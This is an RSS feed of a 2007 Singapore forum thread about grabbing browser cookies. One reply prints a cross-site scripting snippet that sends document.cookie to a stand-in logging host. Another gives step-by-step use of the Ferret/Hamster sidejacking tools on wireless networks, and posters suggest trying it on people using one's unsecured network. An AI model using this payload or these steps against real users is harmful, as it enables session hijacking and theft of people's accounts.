<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/" version="2.0">
  <channel>
    <title>Recent Posts in 'Grab Cookies' | sgForums.com</title>
    <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    <language>en-US</language>
    <ttl>60</ttl>
    <atom:link rel="search" type="application/opensearchdescription+xml" href="http://www.sgforums.com/open_search.xml"/>
    <description></description>
    <item>
      <title>Grab Cookies replied by LatecomerX @ Wed, 05 Sep 2007 15:58:17 +0800</title>
      <description>&lt;blockquote&gt;
&lt;div class="quote_from"&gt;Originally posted by HygieneSetsco:&lt;/div&gt;
&lt;div class="quote_body"&gt;erm. under what conditions can i use
this?&lt;br /&gt;
&lt;br /&gt;
like only at wireless hotspots, where people are using wireless as
well? or can i use it at my desktop at home.&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;If you own a wireless router and currently on subscription of a
broadband connection, you can try "unsecuring" your home wireless
network and see if anyone tries to use your connection to surf the
net. And of course, if there is, try it out on him/her, lol.&lt;br /&gt;
&lt;br /&gt;
Anyway, don't dwell into such stuff for too long - everyone
deserves their privacy. I hope you are taking this out of curiosity
to learn about networking and not on how to stalk on others
etc.&lt;br /&gt;&lt;/p&gt;</description>
      <pubDate>Wed, 05 Sep 2007 15:58:17 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7087962</guid>
      <author>LatecomerX</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by ndmmxiaomayi @ Wed, 05 Sep 2007 12:48:49 +0800</title>
      <description>&lt;p&gt;This tool is solely for wireless only. There is another one
around... but whatever it is, you will need Winpcap on Windows
(it's a packet capturing library) or libpcap on Linux. Mac is Unix
system as well... should be using lipcap... not too sure.&lt;br /&gt;
&lt;br /&gt;
For Linux, compile and run the codes. For Windows, download the
.EXE file.&lt;br /&gt;
&lt;br /&gt;
Try it on your home network rather than outside. I don't guarantee
that you won't be caught.&lt;/p&gt;</description>
      <pubDate>Wed, 05 Sep 2007 12:48:49 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7087292</guid>
      <author>ndmmxiaomayi</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by HygieneSetsco @ Wed, 05 Sep 2007 10:50:12 +0800</title>
      <description>&lt;p&gt;erm. under what conditions can i use this?&lt;br /&gt;
&lt;br /&gt;
like only at wireless hotspots, where people are using wireless as
well? or can i use it at my desktop at home.&lt;/p&gt;</description>
      <pubDate>Wed, 05 Sep 2007 10:50:12 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7086993</guid>
      <author>HygieneSetsco</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by LatecomerX @ Wed, 05 Sep 2007 04:28:25 +0800</title>
      <description>&lt;p&gt;I have just finish reading the included word document, and I can
say that it is really helpful as it includes a step-by-step guide
containing many screenshots; you would probably skip the chunk of
text under "Sidejacking without Hamster" since it is a little
advanced.&lt;br /&gt;
&lt;br /&gt;
Just to summarize things up a bit, mostly similar to their
readme.txt,&lt;br /&gt;
&lt;br /&gt;
1. Install WinPcap.&lt;br /&gt;
2. Unzip the contents of sidejacking.zip to C:\sidejacking or
anything simple&lt;br /&gt;
3. Hit Windows Key+R, run 'cmd' without the quotes&lt;br /&gt;
4. In the black box that appears, type in 'cd C:\sidejacking' and
press Enter. The next line should start with the same folder name
as well.&lt;br /&gt;
5. Type in 'ferret [dash]W' and Enter. If you get a packet.dll
error, you would probably have forgotten about installing
WinPcap&lt;br /&gt;
6. A list of connection interfaces should then appear. Remember the
number that represents your wireless device.&lt;br /&gt;
7. Use a browser that you don't usually use, eg. IE. And configure
its proxy options. Instructions for IE &lt;a href=
"http://support.microsoft.com/kb/135982" rel=
"nofollow"&gt;here&lt;/a&gt;.&lt;br /&gt;
8. In the black box, type in "ferret.exe [dash]i [Number from Step
6]"&lt;br /&gt;
9. Type in 'start hamster' thereafter. If you see a 'hamster.txt:
No such file or directory' error, it means you screwed up somewhere
along, or my summary is missing something. Always believe in
yourself first. =P&lt;br /&gt;
10. After setting up the proxy options at Step 7, go to
'http://hamster/'&lt;br /&gt;
11. You should see a list of IP addresses here. Click on one of
them.&lt;br /&gt;
&lt;br /&gt;
Extra, non-essential info:&lt;br /&gt;
I'm quite inexperienced in networking, but I suppose those are IP
addresses which are only used within the network to identify users
so that the router or whatever knows where should each data packet
go to. This has nothing to do with cookies, btw.&lt;br /&gt;
&lt;br /&gt;
12. Click on one of the links on the left panel.&lt;br /&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;br /&gt;
You have three options here. You can view the raw cookies for this
IP address (discussed below). You can click on a URL that has a
HIGHER probability of being Sidejacked. Or you can choose from the
URLs below, which have a lower probability of being
Sidejacked.&lt;br /&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;13. You did it, you jackfruit! gratz.&lt;br /&gt;
&lt;br /&gt;
And a disclaimer: this is solely for educational purposes. No
ferret or hamster was harmed while I was experimenting with the
tools. =P&lt;br /&gt;&lt;/p&gt;</description>
      <pubDate>Wed, 05 Sep 2007 04:28:25 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7086403</guid>
      <author>LatecomerX</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by LatecomerX @ Wed, 05 Sep 2007 03:42:42 +0800</title>
      <description>&lt;p&gt;Nope, I didn't get a chance to. I don't own a laptop, and people
who are still on those "unsecured wireless networks" with routers
within the range of my adapter are kinda rare.&lt;br /&gt;
&lt;br /&gt;
Anyway, there's a readme.txt and a Word document that should be
able to guide you in getting the hamster running, not literally.
And here's the link to download WinPcap.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.winpcap.org/install/bin/WinPcap_4_0_1.exe" rel=
"nofollow"&gt;http://www.winpcap.org/install/bin/WinPcap_4_0_1.exe&lt;/a&gt;&lt;br /&gt;

&lt;br /&gt;
And here's the content of the readme.txt file.&lt;br /&gt;
&lt;br /&gt;
&lt;img src=
"http://dl.latecomerx.com/images/Screenshot_2007-09-05_edited.jpeg"
alt="image" /&gt;&lt;br /&gt;
&lt;br /&gt;
If you encounter problems with one of the steps, maybe you could
post a screenshot back with details onto this thread and wait for a
reply, from mayi hopefully.&lt;br /&gt;&lt;/p&gt;</description>
      <pubDate>Wed, 05 Sep 2007 03:42:42 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7086398</guid>
      <author>LatecomerX</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by HygieneSetsco @ Wed, 05 Sep 2007 02:36:19 +0800</title>
      <description>&lt;p&gt;hey @ LatecomerX, are you able to use it? &lt;img title="Razz" src=
"/images/emoticons/classic/icon_razz.gif" alt="Razz" /&gt;&lt;/p&gt;</description>
      <pubDate>Wed, 05 Sep 2007 02:36:19 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7086229</guid>
      <author>HygieneSetsco</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by LatecomerX @ Wed, 05 Sep 2007 01:21:59 +0800</title>
      <description>&lt;blockquote&gt;
&lt;div class="quote_from"&gt;Originally posted by yiha093:&lt;/div&gt;
&lt;div class="quote_body"&gt;i undersrand this&lt;br /&gt;
chim la&lt;br /&gt;
&lt;img title="Laughing" src="/images/emoticons/classic/icon_lol.gif"
alt="Laughing" /&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;Hmm, try this. They have "packaged" it to an all-in-one.&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.erratasec.com/sidejacking.zip" rel=
"nofollow"&gt;http://www.erratasec.com/sidejacking.zip&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
from&lt;br /&gt;
&lt;br /&gt;
&lt;a href=
"http://erratasec.blogspot.com/2007/08/sidejacking-with-hamster_05.html"
rel=
"nofollow"&gt;http://erratasec.blogspot.com/2007/08/sidejacking-with-hamster_05.html&lt;/a&gt;&lt;br /&gt;
&lt;/p&gt;</description>
      <pubDate>Wed, 05 Sep 2007 01:21:59 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7086090</guid>
      <author>LatecomerX</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by yiha093 @ Tue, 04 Sep 2007 17:35:50 +0800</title>
      <description>&lt;blockquote&gt;
&lt;div class="quote_from"&gt;Originally posted by LatecomerX:&lt;/div&gt;
&lt;div class="quote_body"&gt;Not really lo. Simply put, he's catching
cookies in the air. So just be careful when surfing on public
wireless hotspots - you never know if mayi is there. XD&lt;br /&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;i undersrand this&lt;br /&gt;
chim la&lt;br /&gt;
&lt;img title="Laughing" src="/images/emoticons/classic/icon_lol.gif"
alt="Laughing" /&gt;&lt;/p&gt;</description>
      <pubDate>Tue, 04 Sep 2007 17:35:50 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7083860</guid>
      <author>yiha093</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by Tremors @ Tue, 04 Sep 2007 14:56:40 +0800</title>
      <description>&lt;p&gt;&lt;img title="Confused" src=
"/images/emoticons/classic/icon_confused.gif" alt="Confused" /&gt;
&lt;img title="Confused" src=
"/images/emoticons/classic/icon_confused.gif" alt="Confused" /&gt;
&lt;img title="Confused" src=
"/images/emoticons/classic/icon_confused.gif" alt="Confused" /&gt;
&lt;img title="Confused" src=
"/images/emoticons/classic/icon_confused.gif" alt="Confused" /&gt;&lt;/p&gt;</description>
      <pubDate>Tue, 04 Sep 2007 14:56:40 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7105574</guid>
      <author>Tremors</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by LatecomerX @ Tue, 04 Sep 2007 14:55:01 +0800</title>
      <description>&lt;blockquote&gt;
&lt;div class="quote_from"&gt;Originally posted by yiha093:&lt;/div&gt;
&lt;div class="quote_body"&gt;chim la hong gan &lt;img title="Laughing" src=
"/images/emoticons/classic/icon_lol.gif" alt="Laughing" /&gt;
&lt;img title="Laughing" src="/images/emoticons/classic/icon_lol.gif"
alt="Laughing" /&gt; &lt;img title="Laughing" src=
"/images/emoticons/classic/icon_lol.gif" alt="Laughing" /&gt;
&lt;img title="Laughing" src="/images/emoticons/classic/icon_lol.gif"
alt="Laughing" /&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;Not really lo. Simply put, he's catching cookies in the air. So
just be careful when surfing on public wireless hotspots - you
never know if mayi is there. XD&lt;br /&gt;&lt;/p&gt;</description>
      <pubDate>Tue, 04 Sep 2007 14:55:01 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7083380</guid>
      <author>LatecomerX</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by yiha093 @ Tue, 04 Sep 2007 11:35:13 +0800</title>
      <description>&lt;blockquote&gt;
&lt;div class="quote_from"&gt;Originally posted by LatecomerX:&lt;/div&gt;
&lt;div class="quote_body"&gt;Got lo. I just gave you my 2 cents.
=P&lt;br /&gt;
&lt;br /&gt;
Anyway, is the tool related to this article, or some other
stuff?&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://blogs.zdnet.com/Ou/?p=651" rel=
"nofollow"&gt;http://blogs.zdnet.com/Ou/?p=651&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;chim la hong gan &lt;img title="Laughing" src=
"/images/emoticons/classic/icon_lol.gif" alt="Laughing" /&gt;
&lt;img title="Laughing" src="/images/emoticons/classic/icon_lol.gif"
alt="Laughing" /&gt; &lt;img title="Laughing" src=
"/images/emoticons/classic/icon_lol.gif" alt="Laughing" /&gt;
&lt;img title="Laughing" src="/images/emoticons/classic/icon_lol.gif"
alt="Laughing" /&gt;&lt;/p&gt;</description>
      <pubDate>Tue, 04 Sep 2007 11:35:13 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7082688</guid>
      <author>yiha093</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by yiha093 @ Tue, 04 Sep 2007 11:31:26 +0800</title>
      <description>&lt;blockquote&gt;
&lt;div class="quote_from"&gt;Originally posted by LatecomerX:&lt;/div&gt;
&lt;div class="quote_body"&gt;Got lo. I just gave you my 2 cents.
=P&lt;br /&gt;
&lt;br /&gt;
Anyway, is the tool related to this article, or some other
stuff?&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://blogs.zdnet.com/Ou/?p=651" rel=
"nofollow"&gt;http://blogs.zdnet.com/Ou/?p=651&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;latercomer also pro ah &lt;img title="Embarassed" src=
"/images/emoticons/classic/icon_redface.gif" alt="Embarassed" /&gt;
&lt;img title="Laughing" src="/images/emoticons/classic/icon_lol.gif"
alt="Laughing" /&gt; &lt;img title="Cool" src=
"/images/emoticons/classic/icon_cool.gif" alt="Cool" /&gt; &lt;img title=
"Laughing" src="/images/emoticons/classic/icon_lol.gif" alt=
"Laughing" /&gt;&lt;/p&gt;</description>
      <pubDate>Tue, 04 Sep 2007 11:31:26 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7082682</guid>
      <author>yiha093</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by ndmmxiaomayi @ Tue, 04 Sep 2007 01:46:46 +0800</title>
      <description>&lt;blockquote&gt;
&lt;div class="quote_from"&gt;Originally posted by LatecomerX:&lt;/div&gt;
&lt;div class="quote_body"&gt;Got lo. I just gave you my 2 cents.
=P&lt;br /&gt;
&lt;br /&gt;
Anyway, is it related to this article, or some other stuff?&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://blogs.zdnet.com/Ou/?p=651" rel=
"nofollow"&gt;http://blogs.zdnet.com/Ou/?p=651&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;Yes, it's related to this article.&lt;/p&gt;</description>
      <pubDate>Tue, 04 Sep 2007 01:46:46 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7081593</guid>
      <author>ndmmxiaomayi</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by LatecomerX @ Tue, 04 Sep 2007 01:44:59 +0800</title>
      <description>&lt;blockquote&gt;
&lt;div class="quote_from"&gt;Originally posted by ndmmxiaomayi:&lt;/div&gt;
&lt;div class="quote_body"&gt;Ya, bluff you no money. Google some
keywords and you will find that tool. I played with it, pretty cool
tool.&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;Got lo. I just gave you my 2 cents. =P&lt;br /&gt;
&lt;br /&gt;
Anyway, is the tool related to this article, or some other
stuff?&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://blogs.zdnet.com/Ou/?p=651" rel=
"nofollow"&gt;http://blogs.zdnet.com/Ou/?p=651&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;</description>
      <pubDate>Tue, 04 Sep 2007 01:44:59 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7081595</guid>
      <author>LatecomerX</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by ndmmxiaomayi @ Mon, 03 Sep 2007 18:55:26 +0800</title>
      <description>&lt;blockquote&gt;
&lt;div class="quote_from"&gt;Originally posted by LatecomerX:&lt;/div&gt;
&lt;div class="quote_body"&gt;Shi meh? So far I only heard of traffic
sniffing in wireless networks and XSS, now got tools to facilitate
cookie stealing one ah?&lt;br /&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;Ya, bluff you no money. Google some keywords and you will find
that tool. I played with it, pretty cool tool.&lt;/p&gt;</description>
      <pubDate>Mon, 03 Sep 2007 18:55:26 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7079234</guid>
      <author>ndmmxiaomayi</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by manyu882 @ Mon, 03 Sep 2007 10:15:02 +0800</title>
      <description>&lt;p&gt;i still rmb i hack my friend's neopets account using cookies.
&lt;img title="Twisted Evil" src=
"/images/emoticons/classic/icon_twisted.gif" alt="Twisted Evil" /&gt;
. it was like 6 yrs ago..&lt;br /&gt;
&lt;br /&gt;
but now technology advance too fast. the login information will
change if the person log out from his account.&lt;/p&gt;</description>
      <pubDate>Mon, 03 Sep 2007 10:15:02 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7077319</guid>
      <author>manyu882</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by yiha093 @ Mon, 03 Sep 2007 04:25:44 +0800</title>
      <description>&lt;p&gt;chimchim &lt;img title="Rolling Eyes" src=
"/images/emoticons/classic/icon_rolleyes.gif" alt=
"Rolling Eyes" /&gt;&lt;/p&gt;</description>
      <pubDate>Mon, 03 Sep 2007 04:25:44 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7076829</guid>
      <author>yiha093</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by LatecomerX @ Mon, 03 Sep 2007 03:08:27 +0800</title>
      <description>&lt;blockquote&gt;
&lt;div class="quote_from"&gt;Originally posted by HygieneSetsco:&lt;/div&gt;
&lt;div class="quote_body"&gt;so i guess i'm not allowed to learn how to
do it?&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;Hmm there are plenty of sites out there to learn about XSS and
SQL injection. But the issue here is about finding a vulnerability
on a website that, say, that will allow you to post unencoded HTML.
So to grab cookie contents, you would probably write something
like:&lt;br /&gt;
&lt;br /&gt;&lt;/p&gt;
&lt;div&gt;code:
&lt;pre&gt;
&lt;br /&gt;
&lt;br /&gt;
var url = 'http://example.com/evil_logging_script.php?cookie_contents=' . document.cookie;&lt;br /&gt;
document.write('&lt;img src="%20+%20url%20+" height="0" width="0" alt=
"image" /&gt;');&lt;br /&gt;
&lt;br /&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;br /&gt;
&lt;br /&gt;
So for example, if you could plant this code into a forum post, as
"raw" HTML, everytime the post is loaded, the browser will attempt
to load a 0 pixel by 0 pixel (aka unseen) image using the URL which
is embedded with the user's cookie information. And on the other
side, when the "image", which is a script, receives the request, it
ignores it and does something like storing the cookie information
that was passed to it through the URL.&lt;br /&gt;
&lt;br /&gt;
But most scripts around filters all these HTML tags from user input
so it is quite pointless unless you really have so much free time
going around to try this out on different websites.&lt;br /&gt;
&lt;br /&gt;
If you are really interested, you can read on the technical
explanation of the infamous MySpace worm, aka Samy Worm. It does
not need to steal cookie - it uses the victim's computer to do what
the coder wanted. Also, another reason why you are less safe using
IE than other browsers - under Step 1, "However, some browsers (IE,
some versions of Safari, others) allow javascript within CSS tags.
We needed javascript to get any of this to even work".&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://namb.la/popular/tech.html" rel=
"nofollow"&gt;http://namb.la/popular/tech.html&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;</description>
      <pubDate>Mon, 03 Sep 2007 03:08:27 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7076749</guid>
      <author>LatecomerX</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by LatecomerX @ Mon, 03 Sep 2007 02:49:28 +0800</title>
      <description>&lt;blockquote&gt;
&lt;div class="quote_from"&gt;Originally posted by ndmmxiaomayi:&lt;/div&gt;
&lt;div class="quote_body"&gt;Technically possible. There's even a tool
to do that. Those who went Defcon or Blackhat will know.
&lt;img title="Mr. Green" src=
"/images/emoticons/classic/icon_mrgreen.gif" alt=
"Mr. Green" /&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;Shi meh? So far I only heard of traffic sniffing in wireless
networks and XSS, now got tools to facilitate cookie stealing one
ah?&lt;br /&gt;&lt;/p&gt;</description>
      <pubDate>Mon, 03 Sep 2007 02:49:28 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7076703</guid>
      <author>LatecomerX</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by amusing_dick @ Mon, 03 Sep 2007 02:34:23 +0800</title>
      <description>&lt;p&gt;and thats how i lost my neopets account which was still hot at
that time on a window 98 system with no knowledge of firewall or
any anti virus system..&lt;br /&gt;
till one day some1 conned me into his website and thats it.. my
2yrs effort gone down the drain..&lt;/p&gt;</description>
      <pubDate>Mon, 03 Sep 2007 02:34:23 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7076685</guid>
      <author>amusing_dick</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by HygieneSetsco @ Mon, 03 Sep 2007 02:06:42 +0800</title>
      <description>&lt;p&gt;so i guess i&#8217;m not allowed to learn how to do it?&lt;/p&gt;</description>
      <pubDate>Mon, 03 Sep 2007 02:06:42 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7076644</guid>
      <author>HygieneSetsco</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by ndmmxiaomayi @ Sun, 02 Sep 2007 01:17:54 +0800</title>
      <description>&lt;p&gt;Cookies contain log in and session information. Grab that of
course to steal password or to hijack a session.&lt;br /&gt;
&lt;br /&gt;
Session is the time between you log in to a website and the time
you log out of a website.&lt;/p&gt;</description>
      <pubDate>Sun, 02 Sep 2007 01:17:54 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7072729</guid>
      <author>ndmmxiaomayi</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by MooKu @ Sun, 02 Sep 2007 01:09:45 +0800</title>
      <description>&lt;p&gt;What&#8217;s does grabbing cookies do?&lt;/p&gt;</description>
      <pubDate>Sun, 02 Sep 2007 01:09:45 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7072682</guid>
      <author>MooKu</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by ndmmxiaomayi @ Sun, 02 Sep 2007 01:09:02 +0800</title>
      <description>&lt;p&gt;Technically possible. There's even a tool to do that. Those who
went Defcon or Blackhat will know. &lt;img title="Mr. Green" src=
"/images/emoticons/classic/icon_mrgreen.gif" alt="Mr. Green" /&gt;&lt;/p&gt;</description>
      <pubDate>Sun, 02 Sep 2007 01:09:02 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7072678</guid>
      <author>ndmmxiaomayi</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
    <item>
      <title>Grab Cookies replied by LatecomerX @ Sat, 01 Sep 2007 23:01:14 +0800</title>
      <description>&lt;p&gt;Pay Famous Amos to sell you some ba.&lt;br /&gt;
&lt;br /&gt;
Anyway,&lt;br /&gt;
&lt;br /&gt;
1. It may be considered as an invasion of privacy. Don't you just
love those spywares lurking somewhere within your computer, or the
list of tracking cookies that shows up during your monthly
clean-up?&lt;br /&gt;
&lt;br /&gt;
2. Technically it is not supposed to be possible through a web
script, as cookies usually can only be accessed within the same
domain. So for example, if you want to grab cookies created at
sgForums.com, the script must be hosted in sgForums.com as well.
But some almost-genius in the past have managed to do so through
cross-site scripting and SQL injection due to vulnerabilities in
scripts. (Hint: sgForums is rumoured to be using a very old version
of phpBB. XD) Google those terms if you are interested.&lt;br /&gt;
&lt;br /&gt;
So, unless you plan to come up with a desktop solution, as in a
spyware or some of its counterparts, in conclusion, this is not
possible.&lt;br /&gt;&lt;/p&gt;</description>
      <pubDate>Sat, 01 Sep 2007 23:01:14 +0800</pubDate>
      <guid isPermaLink="false">www.sgforums.com:2250:277226:7072078</guid>
      <author>LatecomerX</author>
      <link>http://www.sgforums.com/forums/2250/topics/277226</link>
    </item>
  </channel>
</rss>
